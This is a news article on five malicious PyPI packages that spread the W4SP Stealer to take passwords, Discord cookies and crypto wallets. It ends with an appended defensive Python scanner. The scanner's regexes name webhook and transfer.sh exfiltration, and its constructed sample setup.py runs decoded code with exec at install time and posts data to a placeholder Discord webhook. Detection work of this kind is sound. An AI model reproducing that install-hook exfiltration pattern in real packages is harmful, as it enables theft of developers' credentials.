Five malicious packages discovered on the Python Package Index (PyPI) have been stealing sensitive information such as passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.
PyPI is a hub for packages developed in Python, boasting a collection of 200,000 packages, allowing developers to easily find what they need for their projects, saving time and effort.
Between January 27th and 29th, 2023, a malicious actor uploaded five packages containing the W4SP Stealer malware to PyPI. Although the packages were removed, they had already been downloaded by hundreds of developers. The five packages and their download counts:
3m-promo-gen-api – 136 downloads
Ai-Solver-gen – 132 downloads
hypixel-coins – 116 downloads
httpxrequesterv2 – 128 downloads
httpxrequester – 134 downloads
The large number of downloads recorded within days of the initial upload encourages these cybercriminals to re-upload the same code under new package names and accounts once the originals are banned.
Stealing Passwords
Security experts at Fortinet uncovered the packages and found that, upon installation, they attempted to steal passwords saved in web browsers, cookies, and cryptocurrency wallets.
Although Fortinet did not name the information-stealing malware, BleepingComputer identified it as W4SP Stealer, which has appeared frequently in malicious PyPI packages.
The malware starts by stealing data from web browsers such as Google Chrome, Opera, Brave Browser, Yandex Browser, and Microsoft Edge.
It then moves on to steal authentication cookies from Discord, Discord PTB, Discord Canary, and the LightCord client.
Finally, the malware will attempt to take control of the Atomic Wallet and Exodus cryptocurrency wallets, as well as cookies for The Nations Glory online game.
The ‘GatherAll’ function (Fortinet)
The malware also targets a list of websites, harvesting confidential user information that its operator can use to hijack accounts.
List of sites targeted by the malware (Fortinet)
The W4SP Stealer malware collects all the information it can find on an infected machine, then uploads the stolen data to the threat actor’s server through a Discord webhook. Discord webhooks are a feature that allows sending messages with attachments to a Discord server and have become a common tool for cybercriminals to steal files, Discord tokens, and other sensitive information.
According to Fortinet, the malware also contains functions that search the infected machine for files whose names include specific keywords, such as banking, passwords, PayPal, cryptocurrency, and multi-factor authentication; any matching files are uploaded through the “transfer.sh” file transfer service.
Some of these keywords are in French, which suggests that the threat actor may be from France.
The increasing trend of malware distribution through package repositories like PyPI and npm highlights the need for developers to thoroughly examine the code in packages before integrating them into their projects. If any obfuscated code or unusual behavior is detected, the package should be reported to the repository and not used.
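As an added example (not code from the article, from Fortinet, or from any PyPI project), a small pre-install static check that flags, in a downloaded package's source, the indicators described above: Discord webhook URLs, transfer.sh uploads, code that runs at install time, and decode-then-exec obfuscation. The regexes and the constructed setup.py sample are this example's own assumptions.

```python
import re
from pathlib import Path

# Source-level indicators for the behaviour described above: Discord webhook
# exfiltration, transfer.sh uploads, install-time execution and obfuscation.
# The regexes are this example's own assumptions, not Fortinet's signatures.
INDICATORS = {
    "discord_webhook": re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/", re.I),
    "transfer_sh": re.compile(r"https?://transfer\.sh/", re.I),
    "dynamic_exec": re.compile(r"\b(?:exec|eval)\s*\("),
    "base64_decode": re.compile(r"\bb64decode\s*\("),
    "install_hook": re.compile(r"\bcmdclass\s*=|\bclass\s+\w+\s*\(\s*(?:install|develop)\s*\)"),
    "long_literal": re.compile(r"['\"][A-Za-z0-9+/=_-]{200,}['\"]"),
}

def scan_source(text: str) -> dict[str, list[int]]:
    """Return {indicator: [1-based line numbers]} for every hit in the source text."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def scan_package(root: str) -> dict[str, dict[str, list[int]]]:
    """Scan every .py file under an unpacked sdist or wheel before installing it."""
    findings = {}
    for path in Path(root).rglob("*.py"):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings

# Constructed sample (not from the real packages): a setup.py that runs code at
# install time and posts collected data to a Discord webhook placeholder URL.
SAMPLE_SETUP_PY = '''from setuptools import setup
from setuptools.command.install import install
import base64, requests
class PostInstall(install):
    def run(self):
        install.run(self)
        exec(base64.b64decode("aW1wb3J0IG9z"))  # constructed; decodes to "import os"
        requests.post("https://discord.com/api/webhooks/0/PLACEHOLDER", files={"f": b"..."})
setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for name, lines in sorted(scan_source(SAMPLE_SETUP_PY).items()):
        print(f"{name:16} lines {lines}")
```

Run `scan_package` on an extracted `pip download` artifact; a hit is a reason to read the flagged lines, not proof of malice, since legitimate packages occasionally use `exec` or custom install commands.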